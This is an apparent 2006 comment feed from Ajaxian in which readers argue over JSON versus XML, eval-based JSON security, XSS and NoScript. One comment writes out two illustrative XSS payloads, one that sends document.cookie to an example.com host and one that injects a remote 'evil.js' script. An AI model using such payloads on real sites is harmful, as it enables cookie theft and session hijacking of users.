Comments on: AjaxWorld Magazine: JSON versus XML http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml Cleaning up the web with Ajax Thu, 17 May 2012 07:43:39 +0000 hourly 1 http://wordpress.org/?v=3.3.2 By: Matthew Ratzloff http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6782 Matthew Ratzloff Thu, 13 Apr 2006 19:09:51 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6782 > “properly designed� app? security 101, you assume > they are out to get you. That's my point. On a properly-designed web application, you assume that every piece of user data is corrupt, meaning that you won't be subject to the various scripting exploits. You are apparently approaching this from the angle of browsing. I'm approaching it from the angle of server security. If I get a little bit more spam because some site nicked my e-mail address in a XSS exploit... whatever. If someone uses cURL to inject JavaScript into my database and replace my form login action with their own and then passes it back to my server so the user is unaware anything happened, <i>then</i> we have a problem. And on the sites where I do anything of consequence, I trust them to be compentent enough to avoid that, because it's their reputation on the line. > go read up on some of the rudimentary XSS exploits and > i can assure you that you will be running noscript too. I'm well aware of XSS, thanks. > “properly designed� app? security 101, you assume
> they are out to get you.

That’s my point. On a properly-designed web application, you assume that every piece of user data is corrupt, meaning that you won’t be subject to the various scripting exploits.

You are apparently approaching this from the angle of browsing. I’m approaching it from the angle of server security. If I get a little bit more spam because some site nicked my e-mail address in a XSS exploit… whatever. If someone uses cURL to inject JavaScript into my database and replace my form login action with their own and then passes it back to my server so the user is unaware anything happened, then we have a problem. And on the sites where I do anything of consequence, I trust them to be compentent enough to avoid that, because it’s their reputation on the line.

> go read up on some of the rudimentary XSS exploits and
> i can assure you that you will be running noscript too.

I’m well aware of XSS, thanks.

]]> By: fartikus http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6645 fartikus Wed, 12 Apr 2006 15:37:19 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6645 kevin brown - you do not need javascript to use xml to display web pages. see http "get". kevin brown – you do not need javascript to use xml to display web pages. see http “get”.

]]> By: fartikus http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6644 fartikus Wed, 12 Apr 2006 15:36:58 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6644 kevin brown - you do not need javascript to use xml to display web pages. see http get. kevin brown – you do not need javascript to use xml to display web pages. see http get.

]]> By: Jason Haley http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6635 Jason Haley Wed, 12 Apr 2006 12:26:42 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6635 <strong>Interesting Finds</strong> Interesting Finds

]]> By: Kevin Brown http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6630 Kevin Brown Wed, 12 Apr 2006 10:10:00 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6630 Javascript exploits are always going to be simple. A link like, I dunno: javascript:document.location="http://www.example.com?c="+document.cookie OMG I STOLE YOUR COOKIES!!! or maybe even something simple like: javascript:node = document.createNode("script"); node.src = "http://example.com/evil.js"; document.body.appendChild(node); You can't rely on javascript to secure ANYTHING, JSON, XML, or not. JSON is a really convenient way to transfer data. Tons of getElementsByTagName() type of queries are just annoying. If users are able to manipulate the data that you're calling eval on some how, then they're most certainly going to be able to do the above. Javascript exploits are always going to be simple. A link like, I dunno:

javascript:document.location=”http://www.example.com?c=”+document.cookie

OMG I STOLE YOUR COOKIES!!!

or maybe even something simple like:

javascript:node = document.createNode(“script”); node.src = “http://example.com/evil.js”; document.body.appendChild(node);

You can’t rely on javascript to secure ANYTHING, JSON, XML, or not.

JSON is a really convenient way to transfer data. Tons of getElementsByTagName() type of queries are just annoying. If users are able to manipulate the data that you’re calling eval on some how, then they’re most certainly going to be able to do the above.

]]> By: fartikus http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6598 fartikus Tue, 11 Apr 2006 18:12:36 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6598 oh lets not forget that i can apply css to xml directly, thus enabling document presentation for those who disable js. this has the added performance benefit of not requiring createElement at each value in the struct. and use can use xpath on xml once it is appended to the dom (which happens much faster than iterating over an eval'd json struct). oh lets not forget that i can apply css to xml directly, thus enabling document presentation for those who disable js. this has the added performance benefit of not requiring createElement at each value in the struct.

and use can use xpath on xml once it is appended to the dom (which happens much faster than iterating over an eval’d json struct).

]]> By: fartikus http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6595 fartikus Tue, 11 Apr 2006 18:02:43 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6595 lets even add this gem matthew - if you have js globally enabled, its almost certain your cookies have already been sent to an untrustworthy party, like many times. lets even add this gem matthew – if you have js globally enabled, its almost certain your cookies have already been sent to an untrustworthy party, like many times.

]]> By: fartikus http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6593 fartikus Tue, 11 Apr 2006 18:00:44 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6593 "properly designed" app? security 101, you assume they are out to get you. lets turn this around - tell me about all the XSS attacks that use xml as a vector. i am using noscript, so i am not disabling javascript globally. even this site is invoking foreign js. is measuremap trustworthy? maybe, but until i know for sure (and until they provide me with functionality that benefits ME), they are disabled. go read up on some of the rudimentary XSS exploits and i can assure you that you will be running noscript too. “properly designed” app? security 101, you assume they are out to get you. lets turn this around – tell me about all the XSS attacks that use xml as a vector.

i am using noscript, so i am not disabling javascript globally. even this site is invoking foreign js. is measuremap trustworthy? maybe, but until i know for sure (and until they provide me with functionality that benefits ME), they are disabled. go read up on some of the rudimentary XSS exploits and i can assure you that you will be running noscript too.

]]> By: Matthew Ratzloff http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6592 Matthew Ratzloff Tue, 11 Apr 2006 17:35:02 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6592 You disable JavaScript... and you go to an Ajax website. Okay. Feel free to explain how to perform an injection attack with a JSON-based RPC in a <b>properly-designed</b> application, because I would be interested to hear it. You disable JavaScript… and you go to an Ajax website. Okay.

Feel free to explain how to perform an injection attack with a JSON-based RPC in a properly-designed application, because I would be interested to hear it.

]]> By: fartikus http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6589 fartikus Tue, 11 Apr 2006 16:44:20 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6589 of course there is a "winner" - xml. with e4x you get the same binding power of json, actually it has the potential to be much higher performance as it is not doing a whole-language eval as json requires, just a simple binding. and lets not forget the tantalizing potential for json to inject badness into your runtime, which hasn't tripped up anyone yet because json is still in the "we're all friends" era. xml is document structure and thats it, json is, for lack of a better description, a program. sorry for the dupe, this comments system is confusing for those of us who disable js (the captcha appears to be a no-op?) of course there is a “winner” – xml. with e4x you get the same binding power of json, actually it has the potential to be much higher performance as it is not doing a whole-language eval as json requires, just a simple binding. and lets not forget the tantalizing potential for json to inject badness into your runtime, which hasn’t tripped up anyone yet because json is still in the “we’re all friends” era. xml is document structure and thats it, json is, for lack of a better description, a program. sorry for the dupe, this comments system is confusing for those of us who disable js (the captcha appears to be a no-op?)

]]> By: fartikus http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6588 fartikus Tue, 11 Apr 2006 16:42:33 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6588 of course there is a "winner" - xml. with e4x you get the same binding power of json, actually it has the potential to be much higher performance as it is not doing a whole-language eval as json requires, just a simple binding. and lets not forget the tantalizing potential for json to inject badness into your runtime, which hasn't tripped up anyone yet because json is still in the "we're all friends" era. xml is document structure and thats it, json is, for lack of a better description, a program. of course there is a “winner” – xml. with e4x you get the same binding power of json, actually it has the potential to be much higher performance as it is not doing a whole-language eval as json requires, just a simple binding. and lets not forget the tantalizing potential for json to inject badness into your runtime, which hasn’t tripped up anyone yet because json is still in the “we’re all friends” era. xml is document structure and thats it, json is, for lack of a better description, a program.

]]> By: Benjamin http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml/comment-page-1#comment-6572 Benjamin Tue, 11 Apr 2006 15:00:12 +0000 http://ajaxian.com/archives/ajaxworld-magazine-json-versus-xml#comment-6572 Well I guess that's the skinny on the XML saga? Or is it :) Well I guess that’s the skinny on the XML saga? Or is it :)

]]>